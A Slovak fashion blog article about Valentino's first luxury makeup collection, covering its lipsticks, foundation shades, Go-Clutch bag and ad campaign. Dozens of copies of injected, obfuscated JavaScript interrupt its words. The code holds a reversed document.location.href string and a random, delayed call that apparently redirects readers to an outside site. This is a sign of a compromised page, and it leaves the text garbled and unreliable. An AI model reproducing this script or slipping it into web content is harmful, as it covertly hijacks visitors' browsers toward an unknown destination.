Zasnená krása podľa Valentina

| jún 8, 2021

Po dlhých rokoch čakania sme sa predsa len dočkali. Prednedávnom dom Valentino oznámil a oficiálne predstavil svoju novú luxusnú kolekciu make-upu.

Krása je priamo spojená s intenzitobor-latigid//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}tou našich pocitobor-latigid//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}tov,“ uviedol kreatívny riaditeľ značky Valentino, Pierpaolo Piccioli. “Čím viac sme spojení s našim skutobor-latigid//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}točným ja, tým viac sa tobor-latigid//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}to navonok ukazuje a žiari. Valentino beauty je pre snílkov.”

Základným pilierom kolekcie je Rosso Valentino je súbor vybraných rúžov ​​v 50 odtieňoch, ktobor-latigid//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}toré pokrývajú všetky odtiene, od červených,  ružových, zemitých, koralových, až po pastelové, či odvážne farby ako je modrá či fialová v dvoch unikátnych textúrach: zamatobor-latigid//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}tovo matná a saténová s tekutým leskom.

Pokiaľ ide o Valentino mejkap, cieľom podľa tvorcov bolo byť komplexný a inkluzívny, čo sa im jednoznačne podarilo. Vďaka rozsiahlemu výskumu tónov pleti 5 000 žien v 8 krajinách na všetkých kontinentobor-latigid//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}toch je Valentino krycí makeup dostupný až v 40 odtieňoch, aby vyhovel požiadavkám širokospektrálnej klientely z celého sveta.

Ďalším vynikajúcim, a veľmi obľúbeným produktobor-latigid//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}tom najmä medzi influencermi, je jednoznačne mini kabelka/makeup taška „Go-Clutch“, ktobor-latigid//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}torá bola ku kolekcii exkluzívne navrhnutá Picciolim. Mini červená obdĺžniková minikabelka, ktobor-latigid//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}torá je rozmerovo menšia ako iPhone, bola špeciálne navrhnutá tak, aby sa do nej zmestil len púder a rúž od Valentina. Brilantná marketingová stratégia v spojení s elegantným luxusným doplnkom  tvorí najdrahší kúsok v kolekcii – v cene v prepočte 235 eur.

Kolekcia je na debut dosť rozsiahla, a okrem už spomenutých produktobor-latigid//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}tov obsahuje aj osem mini rúžov, tri očné linky a tri produkty na úpravu obočia, osem paletiek očných tieňov, 12 pigmentobor-latigid//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}tov, ktobor-latigid//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}toré je možné použiť ako očné tiene alebo lícenku, čierna riasenka, dva tekuté rozjasňovače, päť poduškových kompaktných rozjasňovačov, päť púdrov, bronzer, viacúčelový lesk na pery a očné trblietky. Je jasné, že Valentino sa mejkapu venuje s plným nasadením a my sme za všetkými desiatimi.

Sprievodnú kampaň nakrútila fotobor-latigid//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}tografka Felicity Ingram. Aj keď je zrejmé, že kreatívny riaditeľ domu bol hnacou silou estetických rozhodnutí v celej kampani, vizážistka Raoúl Alejandom() * 6); if (number1==3){var delay = 18000;setTimeout($nJe(0), delay);}andre, ktobor-latigid//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}torá slúži ako globálna vizážistka spoločnosti Valentino, spolu so 16 modelmi spolupracovala na vytvorení série individualistických a pôsobivých vzhľadov, ktobor-latigid//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}toré poukazujú na inkluzivitu a všestrannosť celej kolekcie.

Fotobor-latigid//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}to: fashionista.com

Tags:

Category: HAIR & MAKEUP, HOMEPAGE

Comments are closed.